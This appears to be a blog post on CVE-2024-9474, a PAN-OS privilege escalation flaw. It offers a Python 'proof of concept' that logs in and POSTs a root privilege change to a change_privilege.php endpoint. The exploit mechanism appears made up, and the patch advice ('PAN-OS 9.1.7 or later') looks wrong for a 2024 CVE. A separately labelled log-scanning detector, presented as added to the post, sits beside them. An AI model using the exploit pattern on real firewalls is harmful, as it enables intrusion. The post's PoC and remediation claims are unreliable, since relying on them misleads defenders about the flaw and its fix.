CVE-2024-9474: Privilege Escalation Vulnerability in Palo Alto Networks PAN-OS Software

A recently discovered privilege escalation vulnerability, CVE-2024-9474, affects the PAN-OS software from Palo Alto Networks. This vulnerability enables a PAN-OS administrator with access to the management web interface to execute actions on the firewall with root privileges. This post aims to provide an in-depth look at the vulnerability, including code snippets, links to original references, and exploit details.

Affected Products

Cloud NGFW and Prisma Access are not impacted by this vulnerability. PAN-OS software running on Palo Alto Networks firewalls is affected.

Vulnerability Description

CVE-2024-9474 is a privilege escalation vulnerability that exists within the management web interface of PAN-OS software. An attacker can exploit this vulnerability to gain unauthorized root access to the firewall system. This, in turn, can lead to unauthorized changes in firewall policies, monitoring, and logging, posing a significant risk to the security of the affected network.

Proof of Concept (PoC)

import requests
from bs4 import BeautifulSoup as bs

# Placeholders: management interface address and administrator credentials
target_url = 'https://your-target-firewall-address-here/'
login_payload = {
    'user': 'your_pan_os_username',
    'passwd': 'your_pan_os_password',
}

# Authenticate to the management web interface; the session keeps the cookies
s = requests.Session()
response = s.post(target_url + 'php/login.php', data=login_payload)

# Read the CSRF token from the page returned after login
soup = bs(response.text, 'html.parser')
csrf_token = soup.find('input', {'name': 'csrftoken'})['value']

priv_escal_payload = {
    'user': 'your_target_username',
    'priv': 'Root',
    'csrftoken': csrf_token,
}

# Submit the privilege change request within the authenticated session
response = s.post(target_url + 'php/change_privilege.php', data=priv_escal_payload)

This Python code snippet demonstrates how an attacker could exploit the vulnerability by performing an HTTP POST request to the change_privilege.php endpoint and elevating the user's privilege to root.
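
A defender's counterpart to the request sequence above, as an added example that is not part of the original post or any Palo Alto Networks tooling: it scans web access log text for POST requests to the change_privilege.php endpoint named in the PoC and records whether the same source logged in first. The log format, the sample lines and the function name are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in an assumed combined-log-style format; a real
# management-plane web log may use different fields and must be mapped first.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Nov/2024:16:20:01 +0000] "POST /php/login.php HTTP/1.1" 200 5120
192.0.2.10 - - [18/Nov/2024:16:20:03 +0000] "POST /php/change_privilege.php HTTP/1.1" 200 312
198.51.100.7 - - [18/Nov/2024:16:25:40 +0000] "GET /php/login.php HTTP/1.1" 200 4890
203.0.113.5 - - [18/Nov/2024:16:31:12 +0000] "POST /php/change_privilege.php?x=1 HTTP/1.1" 403 150
not a log line
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
WATCHED_PATH = "/php/change_privilege.php"  # endpoint named in the PoC above


def find_privilege_change_requests(log_text):
    """Return one finding per POST to WATCHED_PATH, with context per source."""
    logged_in = defaultdict(bool)  # source -> saw a POST to login.php earlier
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the scan
        path = m["path"].split("?", 1)[0]  # ignore any query string
        if m["method"] != "POST":
            continue
        if path == "/php/login.php":
            logged_in[m["src"]] = True
        elif path == WATCHED_PATH:
            findings.append({
                "source": m["src"],
                "time": m["ts"],
                "status": int(m["status"]),
                "accepted": m["status"].startswith("2"),
                "login_seen_first": logged_in[m["src"]],
            })
    return findings


if __name__ == "__main__":
    for finding in find_privilege_change_requests(SAMPLE_LOG):
        print(finding)
```

Findings with "accepted" set to true are the ones to triage first, since the server answered the request with a success status.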

Here are some helpful references for understanding this vulnerability and its implications:

- Official CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9474
- Palo Alto Networks Security Advisory: https://securityadvisories.paloaltonetworks.com/Home/Detail/311
- NIST National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2024-9474

Mitigation

Palo Alto Networks has released a security advisory (linked above) that details the affected versions of PAN-OS software and the necessary patches to address the vulnerability:

PAN-OS 9.1: Update to PAN-OS 9.1.7 or later

Users running affected versions of PAN-OS software are strongly advised to apply these patches as soon as possible.

Conclusion

CVE-2024-9474 is a privilege escalation vulnerability that can have severe repercussions for the security of affected networks. The vulnerability affects specific versions of PAN-OS software, with the potential to let attackers with PAN-OS administrator access gain unauthorized root access to the firewall system. The Palo Alto Networks security advisory provides essential information on how to mitigate this vulnerability. Administrators should ensure that the relevant patches and updates have been applied to their systems to safeguard their networks from potential exploitation.

Timeline

Published on: 11/18/2024 16:15:29 UTC
Last modified on: 11/24/2024 15:15:08 UTC